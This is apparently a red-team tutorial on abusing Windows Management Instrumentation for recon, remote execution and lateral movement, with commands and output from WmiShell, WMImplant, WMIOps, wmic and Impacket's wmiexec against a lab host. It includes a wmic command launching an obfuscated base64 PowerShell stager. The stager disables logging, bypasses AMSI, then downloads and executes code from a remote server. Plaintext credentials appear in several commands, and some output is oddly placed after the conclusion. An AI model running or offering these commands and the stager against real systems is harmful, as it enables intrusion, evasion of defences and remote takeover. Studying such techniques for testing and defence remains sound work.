WMI

Windows Management Instrumentation (WMI) is a Microsoft technology that was designed to allow administrators to perform local and remote management operations across a network. Since WMI is part of the windows ecosystem which exist since Windows 98 it can be used in almost every network regardless if it is running Windows 10 or Windows XP. Some of the operations that can be performed via WMI are:

  • Command Execution
  • File Transfer
  • Read Files and Registry keys
  • File System Examination
  • Subscribe to Events

Red teams can exploit the functionality of WMI and the fact that it can be used against various Windows systems in order to perform host recon, execute commands, perform lateral movement and persistence.

The WMI service is using the DCOM (TCP port 135) or the WinRM protocol (SOAP – port 5985).

WMI Port - DCOM

WMI Ports – DCOM and WinRM

It runs as a SYSTEM and administrator credentials are needed. Since 2014 there are various tools that exist publicly that can be used as a command and control via WMI.

WmiShell

WmiShell is a PowerShell script which is part of the WmiSploit and it is based on the WMIShell which was developed in python by Andrei Dumitrescu. This script uses WMI namespaces to execute commands.

Enter-WmiShell -ComputerName desktop-1st179m -UserName netbiosX

WmiShell - Command Execution

WmiShell – Command Execution

WmiSploit contains also a script which can execute PowerShell commands and scripts on the remote target by using WMI as a communication channel.

Invoke-WmiCommand -ComputerName desktop-1st179m -ScriptBlock {tasklist}

WmiSploit - Executing PowerShell Commands

 

WMImplant

Chris Truncer developed WMImplant which is a PowerShell tool that leverages WMI in order to perform offensive operations. It can be used as command and control tool with the benefit that it doesn’t require an agent to be dropped on the target. However administrator credentials are needed.

Import-Module .\WMImplant.ps1 Invoke-WMImplant
WMImplant - Execution

WMImplant – Execution

The capabilities of WMimplant can be found in the main menu once it is executed. It can perform file transfer operations, lateral movement and host recon.

WMImplant - Main Menu

WMImplant – Main Menu

The change_user is required before the execution of any other commands in order to provide the correct credentials for remote connections.

WMImplant - Authentication and Basic Recon

WMImplant – Authentication and Basic Recon

It is also possible to execute small PowerShell scripts on the target.

WMImplant - Execution of PowerShell Scripts

WMImplant – Execution of PowerShell Scripts

Additionally like the WmiShell tool it has a shell functionality which can be triggered with the command_exec as below:

WMImplant - Shell Commands

WMImplant – Shell Commands

File operations can be also performed remotely.

WMImplant - Directory Listing

WMImplant – Directory Listing

WMIOps

Prior to WMImplant Chris Truncer had developed WMIOps which can be used to perform various actions against targets during red team assessments. Some of these actions include:

  • Transferring files
  • Starting processes
  • Killing processes
  • Folder Sharing

Even though the functionality is limited to compare to WMImplant still it implements the idea of executing commands and receiving output via WMI. The Invoke-ExecCommandWMI has the ability to start a process remotely.

WMIOps - Start a Process

WMIOps – Start a Remote Process

Transferring files over WMI can be achieved with the following function. However it needs local administrator credentials for the remote and the local machine.
Invoke-FileTransferOverWMI -RemoteUser victimusername -RemotePass victimpassword -TARGETS 192.168.1.124 -File C:\Users\netbiosX\Desktop\WMImplant.ps1 -Download C:\Users\User\Downloads\WMI\WMImplant.ps1 -LocalUser Administrator -LocalPass pentestlab

Retrieving System Drive Information:

WMIOps - System Drive Information

WMIOps – System Drive Information

WMIC (out of box )

C:\Windows\system32>runas /netonly /user:htb\administrator "cmd.exe"
Enter the password for htb\administrator:
Attempting to start cmd.exe as user "htb\administrator" ...
=> C:\Windows\system32>wmic /node:192.168.178.10 computersystem list brief /format:list
   Domain=HTB.LOCAL
   Manufacturer=innotek GmbH
   Model=VirtualBox
   Name=PUCKIE
   PrimaryOwnerName=Windows User
   TotalPhysicalMemory=2147012608
=> C:\Windows\system32>wmic /node:192.168.178.10 path win32_loggedonuser get antecedent
   Antecedent
   \\.\root\cimv2:Win32_Account.Domain="PUCKIE",Name="IUSR"
   \\.\root\cimv2:Win32_Account.Domain="PUCKIE",Name="SYSTEM"
   \\.\root\cimv2:Win32_Account.Domain="PUCKIE",Name="LOCAL SERVICE"
   \\.\root\cimv2:Win32_Account.Domain="PUCKIE",Name="NETWORK SERVICE"
   \\.\root\cimv2:Win32_Account.Domain="HTB",Name="hillie"
   \\.\root\cimv2:Win32_Account.Domain="HTB",Name="Administrator"

 

C:\Windows\system32>wmic /node:192.168.178.10 path win32_process call create "powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAcwBpAG8ATgBUAGEAYgBMAEUALgBQAFMAVgBFAHIAUwBJAE8AbgAuAE0AQQBKAE8AcgAgAC0AZwBFACAAMwApAHsAJABHAFAAUwA9AFsAUgBFAEYAXQAuAEEAUwBTAEUAbQBiAEwAeQAuAEcARQBUAFQAWQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkAZQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4ARwBlAHQAVgBhAGwAdQBFACgAJABuAFUATABMACkAOwBJAEYAKAAkAEcAUABTAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQARwBQAFMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAA7ACQARwBQAFMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0ARQBsAFMAZQB7AFsAUwBjAFIAaQBQAFQAQgBsAE8AYwBrAF0ALgAiAEcAZQBUAEYASQBFAGAAbABkACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEAbABVAEUAKAAkAG4AVQBMAEwALAAoAE4ARQBXAC0ATwBiAGoARQBDAHQAIABDAG8ATABMAEUAYwBUAGkAbwBOAHMALgBHAGUAbgBFAHIASQBjAC4ASABhAFMAaABTAGUAdABbAFMAVAByAGkAbgBHAF0AKQApAH0AWwBSAEUAZgBdAC4AQQBzAHMARQBNAGIATABZAC4ARwBFAFQAVAB5AHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAdABGAGkARQBMAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBMAHUAZQAoACQAbgB1AEwAbAAsACQAVABSAHUAZQApAH0AOwB9ADsAWwBTAHkAcwB0AEUAbQAuAE4ARQBUAC4AUwBlAHIAVgBJAEMARQBQAG8AaQBOAHQATQBBAE4AYQBHAGUAUgBdADoAOgBFAHgAcABFAEMAVAAxADAAMABDAG8ATgBUAEkATgBVAGUAPQAwADsAJABXAGMAPQBOAGUAVwAtAE8AYgBqAGUAQwB0ACAAUwB5AHMAdABlAE0ALgBOAEUAdAAuAFcARQBCAEMAbABpAGUATgBUADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBjAC4ASABlAGEAZABFAHIAUwAuAEEAZABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAVwBjAC4AUAByAG8AWAB5AD0AWwBTAFkAcwBUAEUAbQAuAE4AZQB0AC4AVwBFAGIAUgBFAFEAdQBFAFMAVABdADoAOgBEAGUARgBBAFUAbAB0AFcARQBiAFAAUgBPAFgAWQA7ACQAVwBjAC4AUABSAG8AeAB5AC4AQwByAGUAZABlAE4AVABJAGEATABzACAAPQAgAFsAUwB5AFMAdABlAG0ALgBOAGUAdAAuAEMAUgBlAGQAZQBuAHQASQBBAEwAQwBBAGMAaABFAF0AOgA6AEQARQBGAGEAdQBsAHQATgBFAFQAdwBvAFIASwBDAFIAZQBkAGUATgB0AGkAYQBMAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAFkAcwBUAEUAbQAuAFQAZQBYAHQALgBFAE4AYwBPAEQASQBOAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAFQAQgB5AFQAZQBzACgAJwByADIAXgBWAGsAKwBTAHwAMQBfAFQAZwBpADwAKQAoAGIAPwBLAEIAVwB1ADgAbgBlADsARgBhAE8AYwBZAEQAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAFMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AVQBOAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgBYAG8AUgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABzAGUAcgA9ACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQA3ADgALgAxADYAOgA4ADAAJwA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQAVwBjAC4ASABFAGEARABFAHIAUwAuAEEARABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AWgBEAFkAUQAxAHgASwBsAG0AZABVAEMARgA3AFkAMABVADUAaAB3AGQAdQA4AHcARQBZAE0APQAiACkAOwAkAEQAQQBUAGEAPQAkAFcAQwAuAEQAbwBXAG4ATABPAGEARABEAEEAVABBACgAJABTAGUAUgArACQAVAApADsAJABJAHYAPQAkAEQAQQB0AEEAWwAwAC4ALgAzAF0AOwAkAEQAQQB0AGEAPQAkAGQAQQBUAEEAWwA0AC4ALgAkAGQAQQB0AEEALgBsAGUATgBnAHQASABdADsALQBqAG8ASQBuAFsAQwBoAEEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAQQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA=="

Conclusion

Utilizing WMI for recon hosts and for lateral movement can allow the red team to stay hidden and exfiltrate information. The fact that WMI doesn’t need a binary to be dropped in order to retrieve information and that the majority of blue teams don’t monitor WMI activities can eliminate the risk of being discovered. It is therefore necessary not completely disable WMI and to filter traffic to ports 135 and 5985 if it needed.

root@kali:~/htb/puckie# python wmiexec.py Administrator:Passw0rd1@192.168.178.10
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
htb\administrator

 

Resources

(c) 2018